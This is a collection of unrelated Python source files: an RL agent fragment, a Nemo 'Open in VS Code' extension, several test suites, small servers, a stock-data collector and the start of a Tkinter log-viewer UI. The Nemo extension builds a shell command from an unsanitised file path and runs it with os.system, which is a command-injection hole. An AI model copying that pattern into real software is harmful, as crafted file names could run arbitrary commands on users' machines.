self.noise_epsilon = np.exp(-self.episode_cnt / cfg.config.exploration.tau)
self.get_action()
@profiler.wrap
def step(self, reward, state, terminal):
if cfg.config.use_filter:
state = self.filter(state)
self.step_cnt += 1
if self.cur_loop_cnt == cfg.config.loop_size:
self.update()
self.do_task(self.receive_experience)
self.cur_loop_cnt = 0
if reward is not None:
self.push_experience(reward, state, terminal)
self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=reward, reward_weight=1)
else:
self.observation.add_state(state)
self.cur_loop_cnt += 1
self.terminal = terminal
if terminal:
self.update()
self.cur_loop_cnt = 0
self.ps.session.op_inc_episode_cnt(increment=1)
self.observation.add_state(None)
Qmax = self.max_q / float(self.step_cnt)
print('Qmax: %.4f' % Qmax)
self.metrics.scalar('Qmax', Qmax, self.episode_cnt)
self.max_q = self.step_cnt = 0
assert self.last_action is None
self.get_action()
@profiler.wrap
def update(self):
if self.episode.size > cfg.config.batch_size:
experience = self.episode.sample(cfg.config.batch_size)
if not self.exploit:
self.do_task(lambda: self.send_experience(experience))
# Helper methods
def execute_tasks(self):
while True:
task = self.queue.get()
task()
def do_task(self, f):
if self.queue is None:
f()
else:
self.queue.put(f)
@profiler.wrap
def send_experience(self, experience):
# Calculate targets
action_target_scaled = self.session.op_get_actor_target(state=experience['next_state'])
target_q = self.session.op_get_critic_target(state=experience['next_state'],
action=action_target_scaled.astype(np.float32))
y = np.asarray(experience['reward']) + \
cfg.config.rewards_gamma * np.squeeze(target_q) * (~np.asarray(experience['terminal']))
critic_grads = self.session.op_compute_critic_gradients(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
predicted_q = self.session.op_get_critic_q(state=experience['state'],
action=experience['action'])
self.max_q += np.amax(predicted_q)
scaled_out = self.session.op_get_action(state=experience['state'])
action_grads = self.session.op_compute_critic_action_gradients(state=experience['state'],
action=scaled_out)
actor_grads = self.session.op_compute_actor_gradients(state=experience['state'],
grad_ys=action_grads)
if self.terminal and cfg.config.log_lvl == 'DEBUG':
x = self.episode_cnt
self.metrics.histogram('action_target_scaled', action_target_scaled, x)
critic_sq_loss = self.session.op_critic_loss(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
self.metrics.histogram('y', y, x)
self.metrics.scalar('critic_sq_loss', critic_sq_loss, x)
self.metrics.histogram('q_target', target_q, x)
self.metrics.histogram('q_predicted', predicted_q, x)
for i, g in enumerate(utils.Utils.flatten(critic_grads)):
self.metrics.histogram('grads_critic_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(action_grads)):
self.metrics.histogram('grads_action_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(actor_grads)):
self.metrics.histogram('grads_actor_%d' % i, g, x)
if cfg.config.log_lvl == 'VERBOSE':
norm_critic_grads = self.session.op_compute_norm_critic_gradients(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
norm_action_grads = self.session.op_compute_norm_critic_action_gradients(
state=experience['state'], action=scaled_out)
norm_actor_grads = self.session.op_compute_norm_actor_gradients(state=experience['state'],
grad_ys=action_grads)
self.metrics.scalar('grads_norm_critic', norm_critic_grads)
self.metrics.scalar('grads_norm_action', norm_action_grads)
self.metrics.scalar('grads_norm_actor', norm_actor_grads)
self.metrics.histogram('batch_states', experience['state'])
self.metrics.histogram('batch_actions', experience['action'])
self.metrics.histogram('batch_rewards', experience['reward'])
self.metrics.histogram('batch_next_states', experience['next_state'])
if not cfg.config.no_ps:
self.ps.session.op_submit_gradients(gradients=(actor_grads, critic_grads),
step_inc=self.cur_loop_cnt,
agent_step=self.agent_weights_id)
self.ps.session.op_update_target_weights()
else:
self.session.op_apply_actor_gradients(gradients=actor_grads)
self.session.op_apply_critic_gradients(gradients=critic_grads)
self.ps.session.op_inc_step(increment=self.cur_loop_cnt)
self.session.op_update_target_weights()
@profiler.wrap
def receive_experience(self):
if not cfg.config.no_ps:
actor_weights, actor_target_weights, critic_weights, critic_target_weights, \
self.agent_weights_id = self.ps.session.op_get_weights_signed()
else:
actor_weights, actor_target_weights, critic_weights, critic_target_weights = \
self.session.op_get_weights()
self.session.op_assign_actor_weights(weights=actor_weights)
self.session.op_assign_critic_weights(weights=critic_weights)
self.session.op_assign_actor_target_weights(weights=actor_target_weights)
self.session.op_assign_critic_target_weights(weights=critic_target_weights)
if self.terminal and cfg.config.log_lvl == 'DEBUG':
x = self.episode_cnt
for i, g in enumerate(utils.Utils.flatten(actor_weights)):
self.metrics.histogram('weights_actor_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(critic_weights)):
self.metrics.histogram('weights_critic_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(actor_target_weights)):
self.metrics.histogram('weights_actor_target_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(critic_target_weights)):
self.metrics.histogram('weights_critic_target_%d' % i, g, x)
def push_experience(self, reward, state, terminal):
assert self.observation.queue is not None
assert self.last_action is not None
old_state = self.observation.queue
if state is not None:
self.observation.add_state(state)
self.episode.step(
state=old_state,
action=self.last_action,
reward=reward,
terminal=terminal,
next_state=self.observation.queue
)
if cfg.config.log_lvl == 'VERBOSE':
self.metrics.histogram('step_state', old_state)
self.metrics.histogram('step_action', self.last_action)
self.metrics.scalar('step_reward', reward)
self.last_action = None
def get_action(self):
if self.observation.queue is None:
self.last_action = None
else:
self.last_action = self.get_action_from_network()
if cfg.config.ou_noise:
self.last_action += self.noise_epsilon * self.exploration_noise.noise()
else:
self.last_action += 1. / (1. + float(self.episode_cnt))
assert self.last_action is not None
def get_action_from_network(self):
return self.session.op_get_action(state=[self.observation.queue])[0]
|
open-in-vscode-python3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import locale, gettext, urllib.request, urllib.parse, urllib.error, os, subprocess
from gi.repository import Nemo, GObject
from multiprocessing import Process
EXTENSION_NAME = "nemo-open-in-vscode"
LOCALE_PATH = "/usr/share/locale/"
locale.setlocale(locale.LC_ALL, '')
gettext.bindtextdomain(EXTENSION_NAME, LOCALE_PATH)
gettext.textdomain(EXTENSION_NAME)
intl = gettext.gettext
class OpenInVSCode(GObject.GObject, Nemo.MenuProvider):
def __init__(self):
pass
def get_file_items(self, window, files):
if len(files) != 1: return
selected = files[0]
if selected.get_uri_scheme() not in ['file']: return
menu_item = Nemo.MenuItem(
name = 'NemoPython::open-in-vscode',
label = intl('Open in Visual Studio Code'),
tip = intl('Opens the selected folder or file in Visual Studio Code'),
icon = 'gtk-execute'
)
menu_item.connect('activate', self.execute, selected)
return menu_item,
def get_background_items(self, window, current_folder):
menu_item = Nemo.MenuItem(
name = 'NemoPython::open-in-vscode',
label = intl('Open in Visual Studio Code'),
tip = intl('Opens the current folder in Visual Studio Code'),
icon = 'gtk-execute'
)
menu_item.connect('activate', self.execute, current_folder)
return menu_item,
def launch(self, command):
os.system(command)
def execute(self, menu, selected):
uri = urllib.parse.unquote(selected.get_uri()[7:])
try:
code_bin = subprocess.check_output(['which', 'code'], universal_newlines=True).rstrip()
except:
pass
else:
command = ' '.join([code_bin, uri, '--no-sandbox', '--unity-launch'])
proc = Process(target=self.launch, args=(command,))
proc.start()
proc.join()
|
test_lock.py
|
import os
import subprocess
import sys
import threading
import traceback
from modelkit.assets.remote import StorageProvider
from tests import TEST_DIR
def _start_wait_process(lock_path, duration_s):
script_path = os.path.join(TEST_DIR, "assets", "resources", "lock.py")
result = None
def run():
nonlocal result
try:
cmd = [sys.executable, script_path, lock_path, str(duration_s)]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
if p.returncode:
print("ERROR", p.returncode, stdout, flush=True)
raise Exception("lock.py failed")
result = stdout
except Exception:
traceback.print_exc()
t = threading.Thread(target=run)
t.daemon = True
t.start()
def join():
t.join()
return result
return join
def test_lock_file(working_dir):
# Start a bunch of process competing for lock
lock_path = os.path.join(working_dir, "lock")
threads = []
for _ in range(3):
t = _start_wait_process(lock_path, 2)
threads.append(t)
# For each process, collect the timestamp when it acquired and released
# the lock, as well at the number of wait loops.
ranges = []
while threads:
t = threads.pop()
res = t()
assert res is not None
lines = res.splitlines()
assert len(lines) == 2
start = lines[0]
end = lines[1]
ranges.append((float(start), float(end)))
ranges.sort()
# Check the range are exclusive: the lock works assuming it got hit
for i in range(len(ranges) - 1):
end = ranges[i][1]
start = ranges[i + 1][0]
assert end <= start
def test_lock_assetsmanager(capsys, working_dir):
assets_dir = os.path.join(working_dir, "assets_dir")
os.makedirs(assets_dir)
driver_path = os.path.join(working_dir, "local_driver")
os.makedirs(os.path.join(driver_path, "bucket"))
# push an asset
mng = StorageProvider(
provider="local",
bucket=driver_path,
prefix="prefix",
)
data_path = os.path.join(TEST_DIR, "assets", "testdata", "some_data_folder")
mng.new(data_path, "category-test/some-data.ext", "0.0")
# start 4 processes that will attempt to download it
script_path = os.path.join(TEST_DIR, "assets", "resources", "download_asset.py")
cmd = [
sys.executable,
script_path,
assets_dir,
driver_path,
"category-test/some-data.ext:0.0",
]
def run():
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
print(stdout)
threads = []
for _ in range(2):
t = threading.Thread(target=run)
threads.append(t)
t.start()
for t in threads:
t.join()
captured = capsys.readouterr()
assert "__ok_from_cache__" in captured.out
assert "__ok_not_from_cache__" in captured.out
|
cluster_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
from parl.remote.master import Master
from parl.remote.worker import Worker
import time
import threading
from parl.remote.client import disconnect
from parl.remote import exceptions
import timeout_decorator
import subprocess
@parl.remote_class
class Actor(object):
def __init__(self, arg1=None, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def get_unable_serialize_object(self):
return UnableSerializeObject()
def add_one(self, value):
value += 1
return value
def add(self, x, y):
time.sleep(3)
return x + y
def will_raise_exception_func(self):
x = 1 / 0
class TestCluster(unittest.TestCase):
def tearDown(self):
disconnect()
def test_actor_exception(self):
master = Master(port=1235)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1235', 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:1235')
with self.assertRaises(exceptions.RemoteError):
actor = Actor(abcd='a bug')
actor2 = Actor()
for _ in range(3):
if master.cpu_num == 0:
break
time.sleep(10)
self.assertEqual(actor2.add_one(1), 2)
self.assertEqual(0, master.cpu_num)
master.exit()
worker1.exit()
@timeout_decorator.timeout(seconds=800)
def test_actor_exception(self):
master = Master(port=1236)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1236', 1)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:1236')
actor = Actor()
try:
actor.will_raise_exception_func()
except:
pass
actor2 = Actor()
for _ in range(5):
if master.cpu_num == 0:
break
time.sleep(10)
self.assertEqual(actor2.add_one(1), 2)
self.assertEqual(0, master.cpu_num)
del actor
del actor2
worker1.exit()
master.exit()
def test_reset_actor(self):
# start the master
master = Master(port=1237)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1237', 4)
parl.connect('localhost:1237')
for _ in range(10):
actor = Actor()
ret = actor.add_one(1)
self.assertEqual(ret, 2)
del actor
for _ in range(10):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
worker1.exit()
master.exit()
def test_add_worker(self):
master = Master(port=1234)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
worker1 = Worker('localhost:1234', 4)
for _ in range(3):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
worker2 = Worker('localhost:1234', 4)
for _ in range(3):
if master.cpu_num == 8:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 8)
worker2.exit()
for _ in range(10):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
server.py
|
from BaseHTTPServer import HTTPServer
from httpHandler import HttpHandler
from multiprocessing import Process
import asyncore
import socketServer
def __create_http():
http = HTTPServer(('0.0.0.0', 9000), HttpHandler)
print 'HTTP server started...'
http.serve_forever()
def __create_sock():
socketServer.SocketServer('0.0.0.0', 9001)
print 'Socket server started...'
asyncore.loop()
def main():
hs = Process(target=__create_http, args=[])
ss = Process(target=__create_sock, args=[])
try:
hs.start()
ss.start()
except KeyboardInterrupt:
ss.terminate();
hs.terminate();
print 'KeyboardInterrupt: closing servers'
except Exception as e:
ss.terminate();
hs.terminate();
print 'ERROR: ' + e
if __name__ =='__main__': main()
|
messagethrottler.py
|
import time
import threading
import Queue
class MessageThrottler:
def __init__(self, transmitter, max_pages = 3, interval = 15):
self.max_pages = max_pages
self.interval = interval
self.transmitter = transmitter
self._setup_thread()
def _setup_thread(self):
self.message_queue = Queue.Queue()
self.running = True
t = threading.Thread(target=self._message_loop)
t.daemon = True
t.start()
def add_message(self, message):
self.message_queue.put(message)
def _message_loop(self):
next_page = 0
full = False
while self.running:
message = self.message_queue.get()
# the received message is displayed first alone on the
# screen, without the previous message
if message == "clear":
self.transmitter.clear_screen()
next_page = 0
full = False
else:
self.transmitter.add_message(message, next_page)
self.transmitter.set_schedule([next_page])
time.sleep(self.interval)
next_page += 1
if next_page > self.max_pages:
next_page = 0
full = True
schedule = range(0, self.max_pages)
if not full:
schedule = range(0, next_page)
# the messages are displayed reverse chronological order
schedule.reverse()
self.transmitter.set_schedule(schedule)
|
threadsafety.py
|
from __future__ import division
"""The Python interpreter may switch between threads inbetween bytecode
execution. Bytecode execution in fastcache may occur during:
(1) Calls to make_key which will call the __hash__ methods of the args and
(2) `PyDict_Get(Set)Item` calls rely on Python comparisons (i.e, __eq__)
to determine if a match has been found
A good test for threadsafety is then to cache a function which takes user
defined Python objects that have __hash__ and __eq__ methods which live in
Python land rather built-in land.
The test should not only ensure that the correct result is acheived (and no
segfaults) but also assess memory leaks.
The thread switching interval can be altered using sys.setswitchinterval.
"""
class PythonInt:
""" Wrapper for an integer with python versions of __eq__ and __hash__."""
def __init__(self, val):
self.value = val
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
# only compare with other instances of PythonInt
if not isinstance(other, PythonInt):
raise TypeError("PythonInt cannot be compared to %s" % type(other))
return self.value == other.value
from fastcache import clru_cache
#from functools import lru_cache as clru_cache
from random import randint
CACHE_SIZE=301
FIB=CACHE_SIZE-1
RAND_MIN, RAND_MAX = 1, 10
@clru_cache(maxsize=CACHE_SIZE, typed=False)
def fib(n):
"""Terrible Fibonacci number generator."""
v = n.value
return v if v < 2 else fib(PythonInt(v-1)) + fib(PythonInt(v-2))
# establish correct result from single threaded exectution
RESULT = fib(PythonInt(FIB))
def run_fib_with_clear(r):
""" Run Fibonacci generator r times. """
for i in range(r):
if randint(RAND_MIN, RAND_MAX) == RAND_MIN:
fib.cache_clear()
res = fib(PythonInt(FIB))
if RESULT != res:
raise ValueError("Expected %d, Got %d" % (RESULT, res))
def run_fib_with_stats(r):
""" Run Fibonacci generator r times. """
for i in range(r):
res = fib(PythonInt(FIB))
if RESULT != res:
raise ValueError("Expected %d, Got %d" % (RESULT, res))
from threading import Thread
try:
from sys import setswitchinterval as setinterval
except ImportError:
from sys import setcheckinterval
def setinterval(i):
return setcheckinterval(int(i))
def run_threads(threads):
for t in threads:
t.start()
for t in threads:
t.join()
def run_test(n, r, i):
""" Run thread safety test with n threads r times using interval i. """
setinterval(i)
threads = [Thread(target=run_fib_with_clear, args=(r, )) for _ in range(n)]
run_threads(threads)
def run_test2(n, r, i):
""" Run thread safety test to make sure the cache statistics
are correct."""
fib.cache_clear()
setinterval(i)
threads = [Thread(target=run_fib_with_stats, args=(r, )) for _ in range(n)]
run_threads(threads)
hits, misses, maxsize, currsize = fib.cache_info()
if misses != CACHE_SIZE:
raise ValueError("Expected %d misses, Got %d" %
(CACHE_SIZE, misses))
if maxsize != CACHE_SIZE:
raise ValueError("Expected %d maxsize, Got %d" %
(CACHE_SIZE, maxsize))
if currsize != CACHE_SIZE:
raise ValueError("Expected %d currsize, Got %d" %
(CACHE_SIZE, currsize))
import argparse
def main():
parser = argparse.ArgumentParser(description='Run threadsafety test.')
parser.add_argument('-n,--numthreads',
type=int,
default=2,
dest='n',
help='Number of threads.')
parser.add_argument('-r,--repeat',
type=int,
default=5000,
dest='r',
help='Number of times to repeat test. Larger numbers '+
'will make it easier to spot memory leaks.')
parser.add_argument('-i,--interval',
type=float,
default=1e-6,
dest='i',
help='Time in seconds for sys.setswitchinterval.')
run_test(**dict(vars(parser.parse_args())))
run_test2(**dict(vars(parser.parse_args())))
if __name__ == "__main__":
main()
|
deal_new.py
|
import numpy as np
import os
import threading
import goal_address
np.random.seed(1337)
path='1.txt'
db = goal_address.connectdb()
def file_name(file_dir):
for root, dirs, files in os.walk(file_dir):
return files
def load(path):
f = open("./txt/"+path)
f2=open("./new_content/"+path,'w')
type = 1
mid = []
list = [0.0 for i in range(200)]
type_content = 0
for line in f:
if line.strip() == '':
type = 1
if type_content==0:
f2.write('\n')
continue
if type == 1:
goal = goal_address.search_goal(line.strip('\n').rstrip(),db)
# Y.append(line.strip('\n').rstrip())
if(goal!=0):
type_content = 0
f2.write(str(goal))
f2.write('\n')
else:
type_content = 1
type = 0
elif type_content==0:
f2.write(line)
f.close()
f2.close()
files=file_name("./txt/")
for file in files:
if(file!='.DS_Store'):
#load(file)
t = threading.Thread(target=load(file), name=file)
t.start()
t.join()
|
stockbarcollector.py
|
# **************************************************************************** #
# #
# ::: :::::::: #
# stockBarCollector.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: zhongjy1992 <zhongjy1992@outlook.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2019/10/01 22:07:05 by zhongjy1992 #+# #+# #
# Updated: 2020/03/07 13:10:45 by zhongjy1992 ### ########.fr #
# #
# **************************************************************************** #
import datetime
import json
import logging
import os
import threading
import time
import click
from QAPUBSUB.consumer import subscriber_routing
from QAPUBSUB.producer import publisher
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_min_adv, QA_fetch_stock_day_adv, QA_fetch_index_day_adv
from QUANTAXIS.QAUtil.QADate_trade import QA_util_get_pre_trade_date
from pandas import concat, DataFrame, DatetimeIndex, Series
from QUANTAXIS.QAFetch.QATdx_adv import QA_Tdx_Executor
#from QARealtimeCollector.utils.QATdx_adv import QA_Tdx_Executor
# from utils.TdxAdv import QA_Tdx_Executor
from QARealtimeCollector.utils.common import util_is_trade_time, get_file_name_by_date, logging_csv
from pandas.core.series import Series
import pyarrow as pa
logger = logging.getLogger(__name__)
class QARTCStockBar(QA_Tdx_Executor):
# TODO tdx的问题请自行修正,此处只是给出一个分钟bar的采集分发重采样的思路
# TODO 股票订阅请按文档中说明进行http请求
def __init__(self, delay=10.5, date: datetime.datetime = None, log_dir='./log', debug=False):
super().__init__(name='QA_REALTIME_COLLECTOR_STOCK_BAR', thread_num=None, timeout=0.5)
cur_time = datetime.datetime.now() if date is None else date
# set qa_tdx_excutor is debug mode
self.debug = debug
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
self.isRequesting = False
self.delay = delay # 数据获取请求间隔
self.code_list = []
self.sub = subscriber_routing(host=eventmq_ip, exchange='QARealtime_Market', routing_key='stock')
self.sub.callback = self.callback
self.pub = publisher(host=eventmq_ip, exchange='realtime_stock_min')
self.log_dir = log_dir
self.pre_market_data = None
self.last_update_time = cur_time
threading.Thread(target=self.sub.start, daemon=True).start()
logger.info("QA_REALTIME_COLLECTOR_STOCK_BAR INIT, delay %s" % self.delay)
def subscribe_callback(self, code):
"""
订阅回调
:param code:
:return:
"""
if not isinstance(code, str):
logger.error('not string , %s' % code)
return
today = datetime.datetime(self.cur_year, self.cur_month, self.cur_day).isoformat()[:10]
end_date = QA_util_get_pre_trade_date(cursor_date=today, n=1)[:10]
if code not in self.code_list:
self.code_list.append(code)
# ETF or Stock, 获取前天的收盘价格
logger.info("try fetch %s ,%s" % (code, end_date))
if code.startswith('5') or code.startswith('1'):
_data = QA_fetch_index_day_adv(code, end_date, end_date)
else:
_data = QA_fetch_stock_day_adv(code, end_date, end_date)
if _data is not None:
self.pre_market_data = concat([self.pre_market_data, _data.data.reset_index()])
logger.info("fetch %s" % _data.data.to_csv(header=False))
# initial data from server
# self.get_history_data(code, frequency="1min")
def unsubscribe_callback(self, code):
"""
取消订阅回调
:param code:
:return:
"""
self.code_list.remove(code)
def publish_msg(self, msg):
self.pub.pub(msg)
def callback(self, a, b, c, data):
"""
监听订阅信息的回调处理
:param a:
:param b:
:param c:
:param data:
:return:
"""
data = json.loads(data)
if data['topic'].lower() == 'subscribe':
logger.info('stock bar collector service receive new subscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe_callback(item)
else:
self.subscribe_callback(new_ins)
elif data['topic'].lower() == 'unsubscribe':
logger.info('stock bar collector service receive new unsubscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe_callback(item)
else:
self.unsubscribe_callback(new_ins)
def get_data(self, frequency="1min", lens=5):
"""
调用tdx获取数据
:param frequency:
:param lens: increasing data len , default: 获取当前及上一bar
:return:
"""
cur_time = datetime.datetime.now()
data = self.get_security_bar_concurrent(self.code_list, frequency, lens)
dfs = []
logger.info(data)
if len(data) > 0:
self.last_update_time = datetime.datetime.now()
for i in range(len(data)):
df = DataFrame(data[i])
df['code'] = self.code_list[i]
dfs.append(df)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("request请求数据完成,耗时, cost: %s 秒" % cost_time)
return concat(dfs, sort=False).drop_duplicates()
def get_history_data(self, code_list, frequency="1min", n=1):
"""
获取历史数据
:param code_list:
:param frequency: k线数据级别
:param n: (当天)前n个交易日 n = QA_util_get_trade_gap(start_date, today_)
:return:
"""
# TODO 历史数据部分应放在策略计算,而不是数据采集部分
# TODO get history bar data
# TODO 调用QA_fetch_stock_min_adv(code, start, end) 从数据库获取数据
today = datetime.datetime(self.cur_year, self.cur_month, self.cur_day).isoformat()[:10]
start_date = QA_util_get_pre_trade_date(cursor_date=today, n=n)[:10]
end_date = QA_util_get_pre_trade_date(cursor_date=today, n=1)[:10]
# start='2019-05-08', end='2019-05-09' means start from 2019-05-08 9:30 and end to 2019-05-09 15:00
data = None
try:
data = QA_fetch_stock_min_adv(code_list, start=start_date, end=end_date)
except Exception as e:
logger.error("fetch stock min history data failure. " + e.__str__())
if data is not None:
for code in data.code.to_list():
qa_data = data.select_code(code)
if qa_data is not None:
# TODO 规定标准columns
self.publish_msg(qa_data.data.to_msgpack())
else:
lens = 0 # initial data len
if frequency in ['5', '5m', '5min', 'five']:
lens = 48 * n
elif frequency in ['1', '1m', '1min', 'one']:
lens = 240 * n
elif frequency in ['15', '15m', '15min', 'fifteen']:
lens = 16 * n
elif frequency in ['30', '30m', '30min', 'half']:
lens = 8 * n
elif frequency in ['60', '60m', '60min', '1h']:
lens = 4 * n
lens = 20800 if lens > 20800 else lens
# TODO 如果获取失败则在线获取 参考save stock min
# data = self.get_security_bar_concurrent(code_list, frequency, lens)
# TODO 规定标准columns
# self.publish_msg(qa_data.data.to_msgpack())
pass
def update_date(self, date: datetime.datetime = None):
# TODO auto update every day
cur_time = datetime.datetime.now() if date is None else date
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
def length(self):
"""
返回当前订阅列表的大小
:return:
"""
return len(self.code_list)
def update_data_job(self):
cur_time = datetime.datetime.now()
context = self.get_data()
if "code" not in context.columns or "datetime" not in context.columns:
logger.info("the requested data has no columns name like 'code'")
return
if context.shape[0] == 0:
logger.info("the requested data has no rows")
return
# 修正tdx在11:30的数据的时间直接跳至13:00的问题
# if isinstance(context.code[0], str):
context.datetime = context.datetime.apply(lambda x: datetime.datetime.fromisoformat(
x.replace('13:00', '11:30')))
# TODO tdx实时获取可能存在非正常的数据: 1.非交易时间错误 2.OHLC振幅超过上以交易日的10%
# Fixed: 1.非交易时间错误
if "year" in context.columns:
context = context[
(context.year == self.cur_year) & (context.month == self.cur_month) & (
context.day <= self.cur_day)]
# 自动补充0开头的完整股票代码
# context["code"] = context["code"].apply(fill_stock_code)
# TODO 过滤振幅异常的数据
context = context.merge(self.pre_market_data[['code', 'close']], on='code', suffixes=('', '_y'))
# 异常的数据
_context = context[
(
(context.open / context.close_y - 1).abs() >= 0.101
) & (
(context.high / context.close_y - 1).abs() >= 0.101
) & (
(context.low / context.close_y - 1).abs() >= 0.101
) & (
(context.close / context.close_y - 1).abs() >= 0.101
)
]
if _context.shape[0] > 0:
logger.info("异常数据输出START")
logger.info(_context.to_csv())
logger.info("异常数据输出END")
# 过滤异常数据
context = context[
(
(context.open / context.close_y - 1).abs() < 0.101
) & (
(context.high / context.close_y - 1).abs() < 0.101
) & (
(context.low / context.close_y - 1).abs() < 0.101
) & (
(context.close / context.close_y - 1).abs() < 0.101
)
]
# 转换日期数据格式 datetime data type from str to Timestamp('2019-10-24 13:00:00', freq='1T')
context["datetime"] = DatetimeIndex(context.datetime).to_list()
context = context.drop([
"year", "month", "day", "hour", "minute", "close_y"], axis=1
).reset_index(drop=True).set_index(["datetime", "code"]).sort_index()
# TODO context.groupby(code)
end_time = datetime.datetime.now()
self.last_update_time = end_time
cost_time = (end_time - cur_time).total_seconds()
logger.info("clean数据初步清洗, 耗时, cost: %s 秒" % cost_time)
# 数据原始记录输出到csv
logger.info(context.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.collector.%s.csv', self.log_dir)
logging_csv(context, filename, index=True)
self.publish_msg(context.to_json()) # send with maspack
del context
def run(self):
# 循环定时获取数据
count = 0
while 1:
# code list not empty
count += 1
logger.info("stock bar collector service requested data start. count %s" % count)
if self.length() <= 0:
logger.info("code list is empty")
time.sleep(1)
continue
self.isRequesting = True
# 9:15 - 11:31 and 12:58 - 15:00 获取
cur_time = datetime.datetime.now()
_pass = (cur_time - self.last_update_time).total_seconds()
if self.debug or util_is_trade_time(cur_time): # 如果在交易时间
if _pass > 55:
logger.warning("超时未收到更新数据")
self.update_data_job()
else:
logger.info('current time %s not in trade time' % cur_time.isoformat())
logger.info("stock bar collector service requested data end. count %s" % count)
self.isRequesting = False
time.sleep(self.delay)
@click.command()
# @click.argument()
@click.option('-t', '--delay', default=20.5, help="fetch data interval, float", type=click.FLOAT)
@click.option('-log', '--logfile', help="log file path", type=click.Path(exists=False))
@click.option('-log_dir', '--log_dir', help="log path", type=click.Path(exists=False))
def main(delay: float = 20.5, logfile: str = None, log_dir: str = None):
try:
from QARealtimeCollector.utils.logconf import update_log_file_config
logfile = 'stock.collector.log' if logfile is None else logfile
logging.config.dictConfig(update_log_file_config(logfile))
except Exception as e:
print(e.__str__())
QARTCStockBar(delay=delay, log_dir=log_dir.replace('~', os.path.expanduser('~')), debug=False).start()
if __name__ == "__main__":
# normal
main()
|
ui.py
|
from sqlite3 import IntegrityError
from tkinter import *
from tkinter import messagebox, filedialog
from tkinter import font
from tkinter.ttk import *
from threading import Thread
from winlogtimeline import util, collector
from winlogtimeline.util.logs import Record
from .new_project import NewProject
from .tag_settings import TagSettings
from .collection_settings import CollectionSettings
from .import_window import ImportWindow
from .help_window import HelpWindow
from .export_timeline import ExportWindow
from .filter_window import FilterWindow
from .expanded_view import ExpandedView
from .startup_window import StartupWindow
import os
import platform
def enable_disable_wrapper(_lambda):
def decorate(f):
def call(*args, **kwargs):
if not _lambda(*args).enabled:
_lambda(*args).update_status_bar('Notice: The selected action is disabled until a project is opened.')
return None
else:
return f(*args, **kwargs)
return call
return decorate
class GUI(Tk):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.winfo_toplevel().title('PyEventLogViewer')
self.minsize(width=800, height=600)
self.program_config = util.data.open_config()
self.current_project = None
self.menu_bar = MenuBar(self, tearoff=False)
self.status_bar = StatusBar(self)
self.toolbar = Toolbar(self)
self.filter_section = Filters(self)
self.expanded_view = None # SideBar(self)
self.timeline = None
self.enabled = True
self.system = platform.system()
self.changes_made = False
self.create_startup_window()
self.__disable__()
self.protocol('WM_DELETE_WINDOW', self.__destroy__)
def update_status_bar(self, text):
"""
Updates the status bar.
:param text: The message to place in the status bar.
:return:
"""
self.status_bar.update_status(text)
def get_progress_bar_context_manager(self, max_value):
"""
Returns a context manager which can be used to create and update the progress bar.
:param max_value: The maximum value for the progress bar.
:return:
"""
return StatusBarContextManager(self.status_bar, max_value)
def create_project(self):
window = NewProject(self)
window.grab_set()
def open_collection_settings(self):
window = CollectionSettings(self)
window.grab_set()
def open_color_settings(self):
window = TagSettings(self)
window.grab_set()
def open_project(self, project_path):
"""
Opens a project. This will create it if it doesn't already exist.
:param project_path: The path to the project elv file.
:return:
"""
self.current_project = util.project.Project(project_path)
# Check that the project was able to be created
